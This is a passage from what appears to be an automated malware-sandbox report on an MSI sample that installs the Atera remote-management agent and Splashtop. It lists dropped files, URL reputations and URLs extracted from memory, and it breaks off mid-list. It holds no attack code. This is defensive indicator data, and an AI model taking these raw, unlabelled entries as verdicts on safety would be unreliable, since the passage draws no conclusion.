                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\Atera.AgentPackage.Common.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\Newtonsoft.Json.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Atera.AgentCommunication.Models.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Atera.AgentPackage.Common.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\LiteDB.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Newtonsoft.Json.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Polly.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\SharpSnmpLib.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\System.Runtime.InteropServices.RuntimeInformation.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\System.ValueTuple.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Atera.AgentPackage.Common.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Atera.AgentPackages.CommonLib.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Atera.Utils.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Microsoft.ApplicationInsights.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\NLog.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Newtonsoft.Json.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Polly.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\StructureMap.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Buffers.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Diagnostics.DiagnosticSource.dll0%ReversingLabs
                                C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Memory.dll0%ReversingLabs

                                Unpacked PE Files

                                No Antivirus matches

                                Domains

                                No Antivirus matches

                                URLs

                                SourceDetectionScannerLabelLink
                                http://repository.swisssign.com/00%URL Reputationsafe
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                                http://schemas.datacontract.org/2004/07/0%URL Reputationsafe
                                http://www.symauth.com/cps0(0%URL Reputationsafe
                                http://www.symauth.com/rpa000%URL Reputationsafe
                                https://www.newtonsoft.com/jsonschema0%URL Reputationsafe

                                Domains and IPs

                                Contacted Domains

                                No contacted domains info

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://schemas.datacontract.org/2004/07/SystemVSystem.Private.DataContractSerialization.dll.1.drfalse
                                  		unknown
                                  https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=737ec693-90a8-4422-9ac8-a4ec4dd18ff5AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://www.e-me.lv/repository0AteraAgent.exe, 0000000D.00000002.2284530443.0000020ABA070000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://ps.atera.com/agentpackageswin/AgentPackageSTRemote/16.0/AgentPackageSTRemote.zipAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1380000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://schemas.datacontract.orgAteraAgent.exe, 0000000C.00000002.1789701258.000001C5CD199000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://ps.atera.com/agentpackageswin/AgentPackageMonitoring/22.0/AgentPackageMonitoring.zipAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA14F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://ps.atera.com/agentpackagesnet45/AgentPackageMarketplace/1.6/AgentPackageMarketplace.zipAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1224000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://ps.atera.com/agentpackagesnet45/AgentPackageTicketing/29.9/AgentPackageTicketing.zip?KKgGC7fAteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://ps.atera.com/installers/splashtop/win/SplashtopStreamer.exepUsers/Shared/SplashtopAteraAgent.exe, 0000000D.00000002.2284391960.0000020ABA010000.00000004.00000020.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000000.2010019478.0000021719512000.00000002.00000001.01000000.0000001A.sdmpfalse
                                                  		unknown
                                                  https://ps.atera.com/agentpackagesnet45/AgentPackageHeartbeat/17.14/AgentPackageHeartbeat.zippAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1224000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://nlog-project.org/NLog.dll.24.drfalse
                                                      		unknown
                                                      https://agent-api.atera.com/Production/Agent/track-eventrundll32.exe, 00000004.00000002.1732615847.0000000004901000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1732615847.00000000049A4000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1843416546.00000000045F1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1843416546.0000000004694000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        http://dl.google.com/googletalk/googletalk-setup.exeAteraAgent.exe, 0000000D.00000002.2284530443.0000020ABA070000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000000.1924528514.000001BE62232000.00000002.00000001.01000000.00000016.sdmpfalse
                                                          		unknown
                                                          http://repository.swisssign.com/0AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9B88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://agent-api.PjoAgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F6BF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://ps.atera.com/agentpackagesmac/AgentPackageMonitoring/37.8/AgentPackageMonitoring.ziphAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA14D5000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA14F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://agent-api.PHAteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                http://ca.disig.sk/ca/crl/ca_disig.crl0AteraAgent.exe, 0000000D.00000002.2279102001.0000020AB9720000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  http://nlog-project.org/ws/TNLog.dll.24.drfalse
                                                                    		unknown
                                                                    http://nlog-project.org/ws/ILogReceiverServer/ProcessLogMessagesResponsepNLog.dll.24.drfalse
                                                                      		unknown
                                                                      https://ps.atera.com/agentpackagescrossplatform/AgentPackageSTRemote/2.3/AgentPackageSTRemote.zipAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1349000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10C4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://agent-api.atera.com/Production/Agent/rundll32.exe, 00000003.00000003.1679439512.0000000004815000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1732615847.0000000004901000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1732615847.00000000049A4000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1349000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA14F3000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000440E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1843416546.00000000045F1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1843416546.0000000004694000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          http://schemas.datacontract.org/2004/07/System.ServiceProcessAteraAgent.exe, 0000000C.00000002.1789701258.000001C5CD199000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://ps.atera.com/agentpackagescrossplatform/AgentPackageMonitoring/0.40/AgentPackageMonitoring.zAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA14F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://my.splashtop.com/csrs/winAgentPackageSTRemote.exe, 00000021.00000000.2010019478.0000021719512000.00000002.00000001.01000000.0000001A.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2648816776.0000021719FB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=00370d56-8b21-43a9-8b87-a8ec77571e56AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  http://wixtoolset.orgrundll32.exe, 00000003.00000003.1679439512.0000000004846000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000443F000.00000004.00000020.00020000.00000000.sdmp, Arquivo_4593167.msifalse
                                                                                    		unknown
                                                                                    http://www.disig.sk/ca/crl/ca_disig.crl0AteraAgent.exe, 0000000D.00000002.2279102001.0000020AB9720000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://agent-api.atera.com/ProductionAgentPackageAgentInformation.exe, 00000014.00000002.1955362018.000001BE62C63000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F651000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F68C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://agent-api.atera.com/Production/Agent/track-event;rundll32.exe, 00000004.00000002.1732615847.00000000049E6000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1843416546.00000000046D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://ps.atera.com/agentpackageswin/AgentPackageRuntimeInstaller/13.0/AgentPackageRuntimeInstallerAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1168000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            http://acontrol.atera.com/AteraAgent.exe, 0000000C.00000000.1754536857.000001C5CB452000.00000002.00000001.01000000.0000000F.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA0FC1000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD15B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://agent-api.atera.com/Production/Agent/dynamic-fields/AgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F6BF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://agent-api.atera.com/Production/Agent/AgentStarting)AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1248000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA12FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  https://ps.atera.com/agentpackagesmac/AgentPackageAgentInformation/37.9/AgentPackageAgentInformationAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://ps.pndsn.comAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1592000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1349000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10D4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1068000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA159A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1467000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D0E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1CC3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD161C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1C7A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D98000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D02000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D78000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://github.com/mono/linker/pull/649System.Private.CoreLib.dll.1.drfalse
                                                                                                        		unknown
                                                                                                        https://ps.atera.com/agentpackagesnet45/AgentPackageMonitoring/37.8/AgentPackageMonitoring.ziphAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA14D5000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA14F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          https://ps.atera.com/agentpackagesnet45/AgentPackageSTRemote/23.4/AgentPackageSTRemote.zipAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1349000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10C4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1380000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            https://ps.atera.com/agentpackagesnet45/AgentPackageADRemote/6.0/AgentPackageADRemote.zipAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1224000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              https://ps.pndsn.com/v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/bc2f6fef-7e04-492a-b3cbAteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1C7A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D98000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1695000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namerundll32.exe, 00000004.00000002.1732615847.0000000004901000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1732615847.00000000049A4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA0FC1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1843416546.00000000045F1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1843416546.0000000004694000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1955362018.000001BE62C63000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD15B1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F491000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F6BF000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2648816776.0000021719FB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                https://ps.atera.com/agentpackagesnet45/AgentPackageNetworkDiscovery/23.9/AgentPackageNetworkDiscoveAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1224000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1168000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  http://ps.atera.comAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA14F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    http://nlog-project.org/ws/3NLog.dll.24.drfalse
                                                                                                                      		unknown
                                                                                                                      https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=2bfbcf15-78c5-42b3-a888-e57cf083e16dAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1592000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        http://nlog-project.org/ws/5NLog.dll.24.drfalse
                                                                                                                          		unknown
                                                                                                                          https://agent-api.atera.com/Production/Agent/GetRecurringPackagesseTasHAteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            https://ps.atera.com/agentpackagesmac/AgentPackageMonitoring/37.8/AgentPackageMonitoring.zipAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA14F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              http://a6dc35606b2c6816e.awsglobalaccelerator.comAgentPackageSTRemote.exe, 00000021.00000002.2648816776.000002171A09B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                http://agent-api.atera.comrundll32.exe, 00000004.00000002.1732615847.00000000049C5000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1349000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA12FA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA14F3000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1843416546.00000000046B5000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1955362018.000001BE62D0F000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1CFA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1CF6000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D98000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F651000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F68C000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F6E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  http://my.splashtop.comAgentPackageSTRemote.exe, 00000021.00000002.2648816776.000002171A09B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    https://github.com/dotnet/runtimewSystem.Threading.Tasks.Dataflow.dll.1.drfalse
                                                                                                                                      		unknown
                                                                                                                                      https://agent-api.atera.com/Production/Agent/GetRecurrinAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1168000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD1D98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        https://agent-api.atera.com/Production/Agent/dynamic-fields/script-basedAgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F491000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2184094049.000002E94F6BF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          http://schemas.datacontract.org/2004/07/AteraAgent.exe, 0000000C.00000002.1789701258.000001C5CD199000.00000004.00000800.00020000.00000000.sdmp, System.Private.DataContractSerialization.dll.1.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          		unknown
                                                                                                                                          https://github.com/icsharpcode/SharpZipLibAteraAgent.exe, 0000000D.00000002.2284169189.0000020AB9F22000.00000002.00000001.01000000.0000001F.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            https://ps.atera.com/agentpackageswin/AgentPackageNetworkDiscovery/15.0/AgentPackageNetworkDiscoveryAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1168000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              https://ps.atera.com/agentpackagescrossplatform/AgentPackageAgentInformation/1.13/AgentPackageAgentIAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                https://ps.atera.com/agentpackagesnet45/Agent.Package.Watchdog/1.7/Agent.Package.Watchdog.zipAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1224000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10B0000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/vrundll32.exe, 00000003.00000003.1679439512.0000000004815000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000440E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		unknown
                                                                                                                                                    http://schemas.datacontract.org/2004/07/System.Runtime.SerializationSystem.Private.DataContractSerialization.dll.1.drfalse
                                                                                                                                                      		unknown
                                                                                                                                                      https://aka.ms/dotnet-illink/comSystem.Private.CoreLib.dll.1.drfalse
                                                                                                                                                        		unknown
                                                                                                                                                        https://ps.atera.com/agentpackagesnet45/AgentPackageSTRemote/23.4/AgentPackageSTRemote.ziphAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1380000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          https://ps.atera.com/agentpackagescrossplatform/AgentPackageAgentInformation/1.13/AgentPackageAgeAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1349000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		unknown
                                                                                                                                                            https://download.splashtop.comAgentPackageSTRemote.exe, 00000021.00000002.2648816776.000002171A0C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		unknown
                                                                                                                                                              https://ps.atera.com/agentpackagesnet45/AgentPackageProgramManagement/25.8/AgentPackageProgramManageAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1224000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		unknown
                                                                                                                                                                https://ps.atera.com/agentpackagesnet45/AgentPackageTaskScheduler/17.2/AgentPackageTaskScheduler.zipAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1224000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1168000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA10B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		unknown
                                                                                                                                                                  http://www.symauth.com/cps0(xdnup.dll.1.drfalse
                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=e67ebcbd-5956-47bb-95bb-73cf0832e6deAteraAgent.exe, 00000018.00000002.2940646679.0000016BD16B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		unknown
                                                                                                                                                                    HTTPS://PS.ATERA.COM/AGENTPACKAGESNET45/AGENTPACKAGEAGENTINFORMATION/37.9/AGENTPACKAGEAGENTINFORMATIAteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1168000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		unknown
                                                                                                                                                                      http://www.certplus.com/CRL/class3TS.crl0AteraAgent.exe, 0000000D.00000002.2282825260.0000020AB9CC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		unknown
                                                                                                                                                                        https://agent-api.atera.comrundll32.exe, 00000003.00000003.1679439512.0000000004815000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1691787592.00000000047CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1732615847.0000000004901000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1732615847.00000000049A4000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1736086119.0000000004D47000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA13CF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA0FC1000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1349000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA12FA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA14F3000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1796836889.000000000440E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1843416546.00000000045F1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1843416546.0000000004694000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 